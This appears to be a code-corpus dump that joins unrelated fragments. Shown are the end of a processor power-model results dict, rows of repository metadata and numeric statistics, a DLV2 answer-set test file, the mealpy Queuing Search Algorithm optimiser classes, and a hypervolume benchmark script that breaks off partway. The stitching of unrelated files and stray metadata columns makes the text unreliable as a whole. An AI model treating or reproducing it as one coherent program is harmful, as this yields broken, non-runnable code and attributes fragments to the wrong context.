'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0511379,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.25281,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.173547,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.173687,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.62919,
'Instruction Fetch Unit/Runtime Dynamic': 0.424962,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00553716,
'L2/Runtime Dynamic': 0.00176953,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.47472,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.597268,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0400394,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0400393,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.6638,
'Load Store Unit/Runtime Dynamic': 0.834767,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.0987304,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.19746,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0350397,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0350981,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.202248,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0285234,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.418549,
'Memory Management Unit/Runtime Dynamic': 0.0636215,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.5132,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00773688,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0875208,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.0952577,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.9636,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 0.3897204590469652,
'Runtime Dynamic': 0.3897204590469652,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.0236227,
'Runtime Dynamic': 0.0134307,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 73.7343,
'Peak Power': 106.847,
'Runtime Dynamic': 14.7515,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 73.7107,
'Total Cores/Runtime Dynamic': 14.738,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.0236227,
'Total L3s/Runtime Dynamic': 0.0134307,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
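# The report above is a flat mapping from "Component/Subcomponent/Metric" paths to values.
# A hedged sketch (kept as comments, since the variable holding the full dict is not shown
# here) of how the per-component totals relate to their children, using values copied from
# the entries above:
#   'Memory Management Unit/Dtlb/Runtime Dynamic' (0.0350981)
# + 'Memory Management Unit/Itlb/Runtime Dynamic' (0.0285234)
# = 'Memory Management Unit/Runtime Dynamic'      (0.0636215)
# so grouping keys by their leading component name and summing a metric reproduces the
# component-level figure reported alongside its subcomponents.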
| 74.995624
| 124
| 0.68179
| 8,082
| 68,546
| 5.77654
| 0.064835
| 0.12372
| 0.113096
| 0.093561
| 0.942338
| 0.934456
| 0.921047
| 0.89605
| 0.868397
| 0.849634
| 0
| 0.130919
| 0.224535
| 68,546
| 914
| 125
| 74.995624
| 0.74738
| 0
| 0
| 0.664114
| 0
| 0
| 0.658016
| 0.048142
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78381d596a7cf174afef86fe3278172cf3cc1324
| 579
|
py
|
Python
|
tests/parser/grounding.backjump.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.backjump.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/grounding.backjump.3.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
%This is an example where we can not eliminate the duplicates of the rules.
%#maxint=8.
p(X) | r(X) :- q(X,Y), q(A,B), s(X,A), s(Y,B).
q(1,3).
q(2,4).
q(2,7).
q(3,8).
q(3,5).
q(1,6).
s(0,1).
s(1,2).
s(2,3).
s(3,4).
s(4,5).
s(5,6).
s(6,7).
s(7,8).
"""
output = """
%This is an example where we can not eliminate the duplicates of the rules.
%#maxint=8.
p(X) | r(X) :- q(X,Y), q(A,B), s(X,A), s(Y,B).
q(1,3).
q(2,4).
q(2,7).
q(3,8).
q(3,5).
q(1,6).
s(0,1).
s(1,2).
s(2,3).
s(3,4).
s(4,5).
s(5,6).
s(6,7).
s(7,8).
"""
| 12.319149
| 76
| 0.450777
| 150
| 579
| 1.74
| 0.22
| 0.030651
| 0.061303
| 0.114943
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0.957854
| 0
| 0.130337
| 0.231434
| 579
| 46
| 77
| 12.586957
| 0.45618
| 0
| 0
| 0.947368
| 0
| 0.052632
| 0.942272
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
7849208ac635f1befaae961bbbb424de916de039
| 13,414
|
py
|
Python
|
mealpy/human_based/QSA.py
|
ashishpatel26/mealpy
|
62160e61b8bd4b084e44b80fda720e6bd6332e03
|
[
"MIT"
] | 1
|
2021-05-20T06:53:08.000Z
|
2021-05-20T06:53:08.000Z
|
mealpy/human_based/QSA.py
|
chenyuxiang0425/mealpy
|
69e8dc727e15527e31ac5ace1debe92a0bc7d828
|
[
"MIT"
] | null | null | null |
mealpy/human_based/QSA.py
|
chenyuxiang0425/mealpy
|
69e8dc727e15527e31ac5ace1debe92a0bc7d828
|
[
"MIT"
] | 1
|
2020-09-30T21:14:33.000Z
|
2020-09-30T21:14:33.000Z
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 10:21, 18/03/2020 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, choice, exponential, random
from numpy import power, abs, array, where
from copy import deepcopy
from mealpy.root import Root
class BaseQSA(Root):
"""
My version of: Queuing search algorithm (QSA)
(Queuing search algorithm: A novel metaheuristic algorithm for solving engineering optimization problems)
    Notes:
        + Removes the third (innermost) loops of the original algorithm
        + Uses the g_best solution in business 3 instead of a random solution
"""
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100):
Root.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose)
self.epoch = epoch
self.pop_size = pop_size
def _calculate_queue_length__(self, t1, t2, t3):
""" Calculate length of each queue based on t1, t2,t3
t1 = t1 * 1.0e+100
t2 = t2 * 1.0e+100
t3 = t3 * 1.0e+100
"""
if t1 > 1.0e-6:
n1 = (1 / t1) / ((1 / t1) + (1 / t2) + (1 / t3))
n2 = (1 / t2) / ((1 / t1) + (1 / t2) + (1 / t3))
else:
n1 = 1.0 / 3
n2 = 1.0 / 3
q1 = int(n1 * self.pop_size)
q2 = int(n2 * self.pop_size)
q3 = self.pop_size - q1 - q2
return q1, q2, q3
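    # A worked example of the split above (values chosen purely for illustration):
    # with pop_size = 100 and fitness t1 = 1.0, t2 = 2.0, t3 = 4.0,
    #   n1 = (1/1) / (1/1 + 1/2 + 1/4) = 4/7 ~ 0.571  -> q1 = int(0.571 * 100) = 57
    #   n2 = (1/2) / (1/1 + 1/2 + 1/4) = 2/7 ~ 0.286  -> q2 = int(0.286 * 100) = 28
    #   q3 = 100 - 57 - 28 = 15
    # i.e. the better (smaller) the fitness of a leader, the longer the queue it is assigned.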
def _update_business_1__(self, pop=None, current_epoch=None):
A1, A2, A3 = pop[0][self.ID_POS], pop[1][self.ID_POS], pop[2][self.ID_POS]
t1, t2, t3 = pop[0][self.ID_FIT], pop[1][self.ID_FIT], pop[2][self.ID_FIT]
q1, q2, q3 = self._calculate_queue_length__(t1, t2, t3)
case = None
for i in range(self.pop_size):
if i < q1:
if i == 0:
case = 1
A = deepcopy(A1)
elif q1 <= i < q1 + q2:
if i == q1:
case = 1
A = deepcopy(A2)
else:
if i == q1 + q2:
case = 1
A = deepcopy(A3)
beta = power(current_epoch, power(current_epoch / self.epoch, 0.5))
alpha = uniform(-1, 1)
E = exponential(0.5, self.problem_size)
F1 = beta * alpha * (E * abs(A - pop[i][self.ID_POS])) + exponential(0.5) * (A - pop[i][self.ID_POS])
F2 = beta * alpha * (E * abs(A - pop[i][self.ID_POS]))
if case == 1:
X_new = A + F1
new_fit = self.get_fitness_position(X_new)
if new_fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, new_fit]
case = 1
else:
case = 2
else:
X_new = pop[i][self.ID_POS] + F2
new_fit = self.get_fitness_position(X_new)
if new_fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, new_fit]
case = 2
else:
case = 1
return sorted(pop, key=lambda item: item[self.ID_FIT])
def _update_business_2__(self, pop=None):
A1, A2, A3 = pop[0][self.ID_POS], pop[1][self.ID_POS], pop[2][self.ID_POS]
t1, t2, t3 = pop[0][self.ID_FIT], pop[1][self.ID_FIT], pop[2][self.ID_FIT]
q1, q2, q3 = self._calculate_queue_length__(t1, t2, t3)
pr = [i / self.pop_size for i in range(1, self.pop_size + 1)]
if t1 > 1.0e-005:
cv = t1 / (t2 + t3)
else:
cv = 1.0 / 2
for i in range(self.pop_size):
if i < q1:
A = deepcopy(A1)
elif q1 <= i < q1 + q2:
A = deepcopy(A2)
else:
A = deepcopy(A3)
if random() < pr[i]:
i1, i2 = choice(self.pop_size, 2, replace=False)
if random() < cv:
X_new = pop[i][self.ID_POS] + exponential(0.5) * (pop[i1][self.ID_POS] - pop[i2][self.ID_POS])
else:
X_new = pop[i][self.ID_POS] + exponential(0.5) * (A - pop[i1][self.ID_POS])
fit = self.get_fitness_position(X_new)
if fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, fit]
return sorted(pop, key=lambda item: item[self.ID_FIT])
def _update_business_3__(self, pop, g_best):
pr = array([i / self.pop_size for i in range(1, self.pop_size + 1)])
for i in range(self.pop_size):
X_new = deepcopy(pop[i][self.ID_POS])
id1= choice(self.pop_size)
temp = g_best[self.ID_POS] + exponential(0.5, self.problem_size) * (pop[id1][self.ID_POS] - pop[i][self.ID_POS])
X_new = where(random(self.problem_size) > pr[i], temp, X_new)
fit = self.get_fitness_position(X_new)
if fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, fit]
return pop
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
pop = self._update_business_1__(pop, epoch+1)
pop = self._update_business_2__(pop)
pop = self._update_business_3__(pop, g_best)
pop, g_best = self.update_sorted_population_and_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class OppoQSA(BaseQSA):
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100):
BaseQSA.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size)
def _opposition_based__(self, pop=None, g_best=None):
pop = sorted(pop, key=lambda item: item[self.ID_FIT])
for i in range(0, self.pop_size):
X_new = self.create_opposition_position(pop[i][self.ID_POS], g_best[self.ID_POS])
fitness = self.get_fitness_position(X_new)
if fitness < pop[i][self.ID_FIT]:
pop[i] = [X_new, fitness]
return pop
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
pop = self._update_business_1__(pop, epoch)
pop = self._update_business_2__(pop)
pop = self._update_business_3__(pop, g_best)
pop = self._opposition_based__(pop, g_best)
pop, g_best = self.update_sorted_population_and_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class LevyQSA(BaseQSA):
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100):
BaseQSA.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size)
def _update_business_2__(self, pop=None, current_epoch=None):
A1, A2, A3 = pop[0][self.ID_POS], pop[1][self.ID_POS], pop[2][self.ID_POS]
t1, t2, t3 = pop[0][self.ID_FIT], pop[1][self.ID_FIT], pop[2][self.ID_FIT]
q1, q2, q3 = self._calculate_queue_length__(t1, t2, t3)
pr = [i / self.pop_size for i in range(1, self.pop_size + 1)]
if t1 > 1.0e-6:
cv = t1 / (t2 + t3)
else:
cv = 1 / 2
for i in range(self.pop_size):
if i < q1:
A = deepcopy(A1)
elif q1 <= i < q1 + q2:
A = deepcopy(A2)
else:
A = deepcopy(A3)
if random() < pr[i]:
id1= choice(self.pop_size)
if random() < cv:
X_new = self.levy_flight(current_epoch, pop[i][self.ID_POS], A)
else:
X_new = pop[i][self.ID_POS] + exponential(0.5) * (A - pop[id1][self.ID_POS])
fit = self.get_fitness_position(X_new)
if fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, fit]
return sorted(pop, key=lambda item: item[self.ID_FIT])
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
pop = self._update_business_1__(pop, epoch+1)
pop = self._update_business_2__(pop, epoch+1)
pop = self._update_business_3__(pop, g_best)
pop, g_best = self.update_sorted_population_and_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch+1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class ImprovedQSA(OppoQSA, LevyQSA):
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100):
OppoQSA.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size)
LevyQSA.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size)
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
pop = self._update_business_1__(pop, epoch+1)
pop = self._update_business_2__(pop, epoch+1)
pop = self._update_business_3__(pop, g_best)
pop = self._opposition_based__(pop, g_best)
pop, g_best = self.update_sorted_population_and_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class OriginalQSA(BaseQSA):
"""
The original version of: Queuing search algorithm (QSA)
(Queuing search algorithm: A novel metaheuristic algorithm for solving engineering optimization problems)
Link:
"""
def __init__(self, obj_func=None, lb=None, ub=None, problem_size=50, batch_size=10, verbose=True, epoch=750, pop_size=100):
BaseQSA.__init__(self, obj_func, lb, ub, problem_size, batch_size, verbose, epoch, pop_size)
def _update_business_3__(self, pop, g_best):
pr = [i / self.pop_size for i in range(1, self.pop_size + 1)]
for i in range(self.pop_size):
X_new = deepcopy(pop[i][self.ID_POS])
for j in range(self.problem_size):
if random() > pr[i]:
i1, i2 = choice(self.pop_size, 2, replace=False)
e = exponential(0.5)
X1 = pop[i1][self.ID_POS]
X2 = pop[i2][self.ID_POS]
X_new[j] = X1[j] + e * (X2[j] - pop[i][self.ID_POS][j])
fit = self.get_fitness_position(position=X_new, minmax=self.ID_MIN_PROB)
if fit < pop[i][self.ID_FIT]:
pop[i] = [X_new, fit]
return pop
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
pop, g_best = self.get_sorted_pop_and_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
for epoch in range(self.epoch):
pop = self._update_business_1__(pop, epoch)
pop = self._update_business_2__(pop)
pop = self._update_business_3__(pop, g_best)
pop, g_best = self.update_sorted_population_and_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
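# A minimal, hedged usage sketch (not part of the library): the objective function and the
# bound values below are illustrative assumptions; the constructor and train() signatures
# are taken from the classes above.
if __name__ == "__main__":
    def sphere(solution):
        # Hypothetical objective: sum of squares, minimised at the zero vector.
        return sum(x ** 2 for x in solution)

    model = BaseQSA(obj_func=sphere, lb=[-10] * 5, ub=[10] * 5,
                    problem_size=5, verbose=False, epoch=20, pop_size=30)
    best_position, best_fitness, loss_history = model.train()
    print(best_fitness)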
| 47.066667
| 127
| 0.553675
| 1,915
| 13,414
| 3.597911
| 0.090862
| 0.075762
| 0.05225
| 0.035123
| 0.835704
| 0.79971
| 0.785631
| 0.773004
| 0.766763
| 0.754136
| 0
| 0.03542
| 0.311764
| 13,414
| 284
| 128
| 47.232394
| 0.710897
| 0.095572
| 0
| 0.725664
| 0
| 0
| 0.009995
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075221
| false
| 0
| 0.017699
| 0
| 0.168142
| 0.022124
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
786270be520d714e95a833a9719b491def9ebb3c
| 6,918
|
py
|
Python
|
help scripts/experimentsMOGA.py
|
napa-jmm/CEGO
|
172d511133a608ca5bf265d9ebd2937b8a171b3e
|
[
"MIT"
] | 6
|
2018-07-18T06:38:42.000Z
|
2021-11-17T21:01:40.000Z
|
help scripts/experimentsMOGA.py
|
napa-jmm/CEGO
|
172d511133a608ca5bf265d9ebd2937b8a171b3e
|
[
"MIT"
] | null | null | null |
help scripts/experimentsMOGA.py
|
napa-jmm/CEGO
|
172d511133a608ca5bf265d9ebd2937b8a171b3e
|
[
"MIT"
] | 6
|
2018-10-15T09:35:24.000Z
|
2021-05-08T13:40:19.000Z
|
# -*- coding: utf-8 -*-
"""
Created on Tue Mar 20 09:00:23 2018
@author: r.dewinter
"""
import numpy as np
import matplotlib.pyplot as plt
from hypervolume import hypervolume
from paretofrontFeasible import paretofrontFeasible
import os
#plt.plot(objectivesMOGA[:,0],objectivesMOGA[:,1],'ro',c='r')
#plt.plot(objectivesSPEA2[:,0],objectivesSPEA2[:,1],'ro',c='b')
#plt.plot(objectivesNSGAII[:,0],objectivesNSGAII[:,1],'ro',c='g')
#plt.plot(objectivesCEGO[:,0],objectivesCEGO[:,1],'ro',c='m')
hyp = []
fname = 'optimize ship'
ref = np.array([5000,2])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,9:-3]
constraints[:,:4] = constraints[:,:4]*-1+1
constraints[:,4:] = constraints[:,4:]*-1
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'SRD'
ref = np.array([7000,1700])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,10:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'TBTD'
ref = np.array([0.1,100000])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,6:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'WB'
ref = np.array([350,0.1])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,7:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'DBD'
ref = np.array([5,50])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,7:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'SPD'
ref = np.array([16,19000,-260000])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,9:-4]
objectives = data[1:,-4:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'WP'
ref = np.array([83000, 1350, 2.85, 15989825, 25000])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,6:13]
objectives = data[1:,13:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
############################ artificial
hyp = []
fname = 'BNH'
ref = np.array([140,50])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-5:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'CEXP'
ref = np.array([1,9])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-5:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'C3DTLZ4'
ref = np.array([3,3])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-5:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
print(fname,np.max(hyp))
print(fname,np.std(hyp))
hyp = []
fname = 'SRN'
ref = np.array([301,72])
for file in os.listdir(fname):
data = np.genfromtxt(fname+'/'+file, delimiter=',')
constraints = data[1:,-5:-3]
objectives = data[1:,-3:-1]
feasible = np.sum(constraints<=0,axis=1) == constraints.shape[1]
hyp.append(hypervolume(objectives[feasible],ref))
print(fname,np.mean(hyp))
